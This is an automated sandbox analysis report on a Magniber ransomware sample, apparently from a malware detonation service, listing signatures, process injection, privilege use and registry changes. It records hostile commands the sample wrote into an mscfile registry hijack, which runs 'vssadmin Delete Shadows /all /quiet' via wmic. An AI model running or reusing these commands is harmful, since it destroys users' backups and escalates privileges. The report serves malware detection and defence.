Malware Analysis Report

2025-01-22 20:47

Sample ID 241205-mtf86axjaq
Target c752934305e1b89f82798ea2c26f70b3_JaffaCakes118
SHA256 20e29bfcd2d3372af66eec996bcbc0babbeb8bc36b6a3edcd3afc70782aaea2e
Tags
magniber defense_evasion discovery execution impact ransomware
score
10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V15
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

score
10/10

SHA256

20e29bfcd2d3372af66eec996bcbc0babbeb8bc36b6a3edcd3afc70782aaea2e

Threat Level: Known bad

The file c752934305e1b89f82798ea2c26f70b3_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

magniber defense_evasion discovery execution impact ransomware

Magniber family

Detect magniber ransomware

Magniber Ransomware

Process spawned unexpected child process

Renames multiple (93) files with added filename extension

Renames multiple (72) files with added filename extension

Deletes shadow copies

Drops desktop.ini file(s)

Suspicious use of SetThreadContext

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Unsigned PE

Browser Information Discovery

Suspicious use of SetWindowsHookEx

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Opens file in notepad (likely ransom note)

Uses Volume Shadow Copy service COM API

Modifies Internet Explorer settings

Interacts with shadow copies

Suspicious use of UnmapMainImage

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-12-05 10:45

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted 2024-12-05 10:45
Reported 2024-12-05 10:47
Platform win7-20240708-en
Max time kernel 120s
Max time network 141s

Command Line

"taskhost.exe"

Signatures

Detect magniber ransomware

Description Indicator Process Target
N/A N/A N/A N/A

Magniber Ransomware

ransomware magniber

Magniber family

magniber

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe

Deletes shadow copies

ransomware defense_evasion impact execution

Renames multiple (93) files with added filename extension

ransomware

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini C:\Windows\system32\DllHost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L2BFB2JG\desktop.ini C:\Windows\system32\DllHost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MYC3PENY\desktop.ini C:\Windows\system32\DllHost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9C9T5AL\desktop.ini C:\Windows\system32\DllHost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROVWYKHE\desktop.ini C:\Windows\system32\DllHost.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2568 set thread context of 1112 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\taskhost.exe
PID 2568 set thread context of 1164 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\Dwm.exe
PID 2568 set thread context of 1204 N/A C:\Windows\system32\rundll32.exe C:\Windows\Explorer.EXE
PID 2568 set thread context of 496 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\DllHost.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 303bf7df0247db01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "439557394" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{09231DD1-B2F6-11EF-85B7-D6CBE06212A9} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 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 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000615ccd883db7b1459927a3dc74b58ce200000000020000000000106600000001000020000000b90982fe91f023b3236dde152a8bbd6a89203fdaac2c9fd4a0a7edcf246fe4a4000000000e8000000002000020000000f684a0a08249d2460fcffb9f7b073a14a460cb6b85422db1bcf29687725f2a892000000067f6c5d809a5f7d1ee5fdc7aa6c92f360c3a4d556efd5d9279d3a5999b8424a640000000459ecebed5cb746bb738d732fa0d504f6ebbcc0dd907690640a9688a0b5b6079262a5039028699e6f621a068b11f861d75eee12ff49b1fa99a6f8e88d850c256 C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell\open\command C:\Windows\system32\taskhost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\system32\taskhost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell\open\command C:\Windows\system32\Dwm.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\system32\Dwm.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell\open\command C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell\open\command C:\Windows\system32\DllHost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\system32\DllHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell\open\command C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell\open C:\Windows\Explorer.EXE N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\notepad.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1204 wrote to memory of 572 N/A C:\Windows\Explorer.EXE C:\Windows\notepad.exe
PID 1204 wrote to memory of 572 N/A C:\Windows\Explorer.EXE C:\Windows\notepad.exe
PID 1204 wrote to memory of 572 N/A C:\Windows\Explorer.EXE C:\Windows\notepad.exe
PID 1204 wrote to memory of 2216 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1204 wrote to memory of 2216 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1204 wrote to memory of 2216 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1204 wrote to memory of 1724 N/A C:\Windows\Explorer.EXE C:\Windows\system32\wbem\wmic.exe
PID 1204 wrote to memory of 1724 N/A C:\Windows\Explorer.EXE C:\Windows\system32\wbem\wmic.exe
PID 1204 wrote to memory of 1724 N/A C:\Windows\Explorer.EXE C:\Windows\system32\wbem\wmic.exe
PID 1204 wrote to memory of 892 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1204 wrote to memory of 892 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1204 wrote to memory of 892 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 892 wrote to memory of 3052 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 892 wrote to memory of 3052 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 892 wrote to memory of 3052 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 2216 wrote to memory of 2664 N/A C:\Windows\system32\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2216 wrote to memory of 2664 N/A C:\Windows\system32\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2216 wrote to memory of 2664 N/A C:\Windows\system32\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 1164 wrote to memory of 2628 N/A C:\Windows\system32\Dwm.exe C:\Windows\system32\wbem\wmic.exe
PID 1164 wrote to memory of 2628 N/A C:\Windows\system32\Dwm.exe C:\Windows\system32\wbem\wmic.exe
PID 1164 wrote to memory of 2628 N/A C:\Windows\system32\Dwm.exe C:\Windows\system32\wbem\wmic.exe
PID 1164 wrote to memory of 2640 N/A C:\Windows\system32\Dwm.exe C:\Windows\system32\cmd.exe
PID 1164 wrote to memory of 2640 N/A C:\Windows\system32\Dwm.exe C:\Windows\system32\cmd.exe
PID 1164 wrote to memory of 2640 N/A C:\Windows\system32\Dwm.exe C:\Windows\system32\cmd.exe
PID 2664 wrote to memory of 2700 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2664 wrote to memory of 2700 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2664 wrote to memory of 2700 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2664 wrote to memory of 2700 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2640 wrote to memory of 600 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 2640 wrote to memory of 600 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 2640 wrote to memory of 600 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 2540 wrote to memory of 1200 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\CompMgmtLauncher.exe
PID 2540 wrote to memory of 1200 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\CompMgmtLauncher.exe
PID 2540 wrote to memory of 1200 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\CompMgmtLauncher.exe
PID 1200 wrote to memory of 236 N/A C:\Windows\system32\CompMgmtLauncher.exe C:\Windows\system32\wbem\wmic.exe
PID 1200 wrote to memory of 236 N/A C:\Windows\system32\CompMgmtLauncher.exe C:\Windows\system32\wbem\wmic.exe
PID 1200 wrote to memory of 236 N/A C:\Windows\system32\CompMgmtLauncher.exe C:\Windows\system32\wbem\wmic.exe
PID 2820 wrote to memory of 2464 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\CompMgmtLauncher.exe
PID 2820 wrote to memory of 2464 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\CompMgmtLauncher.exe
PID 2820 wrote to memory of 2464 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\CompMgmtLauncher.exe
PID 2464 wrote to memory of 1340 N/A C:\Windows\system32\CompMgmtLauncher.exe C:\Windows\system32\wbem\wmic.exe
PID 2464 wrote to memory of 1340 N/A C:\Windows\system32\CompMgmtLauncher.exe C:\Windows\system32\wbem\wmic.exe
PID 2464 wrote to memory of 1340 N/A C:\Windows\system32\CompMgmtLauncher.exe C:\Windows\system32\wbem\wmic.exe
PID 2568 wrote to memory of 2904 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\wbem\wmic.exe
PID 2568 wrote to memory of 2904 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\wbem\wmic.exe
PID 2568 wrote to memory of 2904 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\wbem\wmic.exe
PID 2568 wrote to memory of 2372 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\cmd.exe
PID 2568 wrote to memory of 2372 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\cmd.exe
PID 2568 wrote to memory of 2372 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\cmd.exe
PID 2372 wrote to memory of 2156 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 2372 wrote to memory of 2156 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 2372 wrote to memory of 2156 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 1660 wrote to memory of 2860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\CompMgmtLauncher.exe
PID 1660 wrote to memory of 2860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\CompMgmtLauncher.exe
PID 1660 wrote to memory of 2860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\CompMgmtLauncher.exe
PID 2860 wrote to memory of 1620 N/A C:\Windows\system32\CompMgmtLauncher.exe C:\Windows\system32\wbem\wmic.exe
PID 2860 wrote to memory of 1620 N/A C:\Windows\system32\CompMgmtLauncher.exe C:\Windows\system32\wbem\wmic.exe
PID 2860 wrote to memory of 1620 N/A C:\Windows\system32\CompMgmtLauncher.exe C:\Windows\system32\wbem\wmic.exe
PID 1112 wrote to memory of 2908 N/A C:\Windows\system32\taskhost.exe C:\Windows\system32\wbem\wmic.exe
PID 1112 wrote to memory of 2908 N/A C:\Windows\system32\taskhost.exe C:\Windows\system32\wbem\wmic.exe
PID 1112 wrote to memory of 2908 N/A C:\Windows\system32\taskhost.exe C:\Windows\system32\wbem\wmic.exe
PID 1112 wrote to memory of 2332 N/A C:\Windows\system32\taskhost.exe C:\Windows\system32\cmd.exe
PID 1112 wrote to memory of 2332 N/A C:\Windows\system32\taskhost.exe C:\Windows\system32\cmd.exe
